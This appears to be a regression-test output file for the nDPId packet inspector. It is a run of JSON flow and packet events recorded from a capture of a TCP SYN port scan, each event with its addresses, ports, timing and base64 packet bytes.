+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAs4GwAADsGLQasEAAIQA2GNIzSB\/bdUoMYAAAAAGACEAAgmQAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsGQQAAC0GAm+sEAAIQA2GNIzSN57dUoMYAAAAAGACCAD48AAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAspb4AACcGe7SsEAAIQA2GNIzSAgLdUoMYAAAAAGACEAAmjQAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsFWEAADEGAhKsEAAIQA2GNIzSDyjdUoMYAAAAAGACCAAhZwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAso3UAADMGcf2sEAAIQA2GNIzSRdXdUoMYAAAAAGACEADiuQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsMF0AADkG3xWsEAAIQA2GNIzSHmHdUoMYAAAAAGACCAASLgAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsn0UAADYGcy2sEAAIQA2GNIzSEvDdUoMYAAAAAGACDAAZnwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAs4gcAADQGMmusEAAIQA2GNIzSgArdUoMYAAAAAGACBAC0hAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsXREAADQGt2GsEAAIQA2GNIzSPtDdUoMYAAAAAGACBAD1vgAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsteEAACUGbZGsEAAIQA2GNIzSBjrdUoMYAAAAAGACCAAqVQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsnHoAADgGc\/isEAAIQA2GNIzS\/ejdUoMYAAAAAGACBAA2pgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAslDEAACYGjkGsEAAIQA2GNIzSBDPdUoMYAAAAAGACDAAoXAAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsoWoAADoGbQisEAAIQA2GNIzSBRTdUoMYAAAAAGACDAAnewAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAso5AAACsGeeKsEAAIQA2GNIzSCo3dUoMYAAAAAGACEAAeAgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsvS0AAC4GXUWsEAAIQA2GNIzSA0vdUoMYAAAAAGACDAApRAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAscKEAADYGodGsEAAIQA2GNIzSB9XdUoMYAAAAAGACDAAkugAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsersAACgGpbesEAAIQA2GNIzSI\/DdUoMYAAAAAGACBAAQnwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsq6kAACYGdsmsEAAIQA2GNIzSFw\/dUoMYAAAAAGACDAAVgAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsKewAADoG5IasEAAIQA2GNIzSBCvdUoMYAAAAAGACDAAoZAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsObQAAC0G4b6sEAAIQA2GNIzSD6PdUoMYAAAAAGACCAAg7AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAs3g8AACoGQGOsEAAIQA2GNIzShGvdUoMYAAAAAGACDACoIwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsLuQAAC0G7I6sEAAIQA2GNIzSHfzdUoMYAAAAAGACCAASkwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAsY6MAADsGqc+sEAAIQA2GNIzSOGrdUoMYAAAAAGACEADwJAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAsaAkAACYGummsEAAIQA2GNIzSemndUoMYAAAAAGACDACyJQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAsT64AACsGzcSsEAAIQA2GNIzSBN\/dUoMYAAAAAGACEAAjsAAAAgQFtA=="} 